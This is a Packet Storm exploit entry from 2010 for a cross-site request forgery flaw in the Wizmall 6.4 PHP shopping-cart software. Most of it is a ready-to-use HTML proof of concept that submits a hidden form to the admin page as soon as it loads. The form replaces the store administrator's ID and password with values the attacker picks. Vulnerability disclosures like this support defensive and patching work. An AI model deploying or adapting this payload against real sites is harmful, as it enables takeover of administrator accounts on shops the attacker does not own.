Wizmall 6.4 Cross Site Request Forgery

2010-08-12T00:00:00
ID PACKETSTORM:92640
Type packetstorm
Reporter pyw1414
Modified 2010-08-12T00:00:00

Description

                                        
                                            `# Exploit Title: wizmall 6.4 CSRF Vulnerabilities  
# Date: 08/10/2010  
# Author: pyw1414 <i2SEC>  
# Software Link: http://www.shop-wiz.com/board/main/view/root/wizmall01/159/0  
# Version: 6.4 UTF-8 For php  
# Tested on: XP SP3  
  
  
  
-=[ CSRF Exploit - Change Admin ID/PW ]=-  
  
<html>  
<head>  
<title>Wizmall 6.4 UTF-8 For php CSRF Vulnerabilities - Change Admin Id/Password</title>  
</head>  
  
<body onload="document.csrf.submit();">  
<form name="csrf" action="http://[domain]/malladmin/main.php" method="POST">  
<!--- Edit these --->  
<input type="hidden" name="ID" value="i2sec" />   
<input type="hidden" name="PASS" value="test1234" />   
<input type="hidden" name="PASS1" value="test1234" />  
  
<!--- Do not edit below --->  
<input type="hidden" name="menushow" value="menu1" />   
<input type="hidden" name="theme" value="basicconfig/basic_info2" />   
<input type="hidden" name="action" value="admin_save" />   
<input type="hidden" name="ADMIN_NAME" value="pyw1414" />  
<input type="hidden" name="ADMIN_TITLE" value="i2Sec+Plaza" />   
<input type="hidden" name="ADMIN_TITLE_E" value="" />   
<input type="hidden" name="COMPANY_DOMAIN" value="" />  
<input type="hidden" name="str_watermark" value="" />   
<input type="hidden" name="img_watermark" value="" />   
<input type="hidden" name="HOME_URL" value="" />   
<input type="hidden" name="ADMIN_EMAIL" value="ii@i2sec.co.kr" />   
<input type="hidden" name="ADMIN_TEL" value="" />  
<input type="hidden" name="COMPANY_NAME" value="i2Sec" />   
<input type="hidden" name="PRESIDENT" value="" />   
<input type="hidden" name="COMPANY_NUM" value="" />   
<input type="hidden" name="COMPLICENCE_NUM" value="" />   
<input type="hidden" name="CUSTOMER_TEL" value="" />  
<input type="hidden" name="CUSTOMER_FAX" value="" />   
<input type="hidden" name="COMPANY_ADD" value="" />   
<input type="hidden" name="COMPLICENCE_NUM" value="" />   
<input type="hidden" name="MART_BASEDIR" value="" />  
<input type="hidden" name="SYSTEM_BASEDIR" value="" />   
<input type="hidden" name="smsModule" value="ANYSMS" />   
<input type="hidden" name="sms_id" value="" />   
<input type="hidden" name="sms_pwd" value="" />  
  
</form>  
</body>  
</html>  
  
`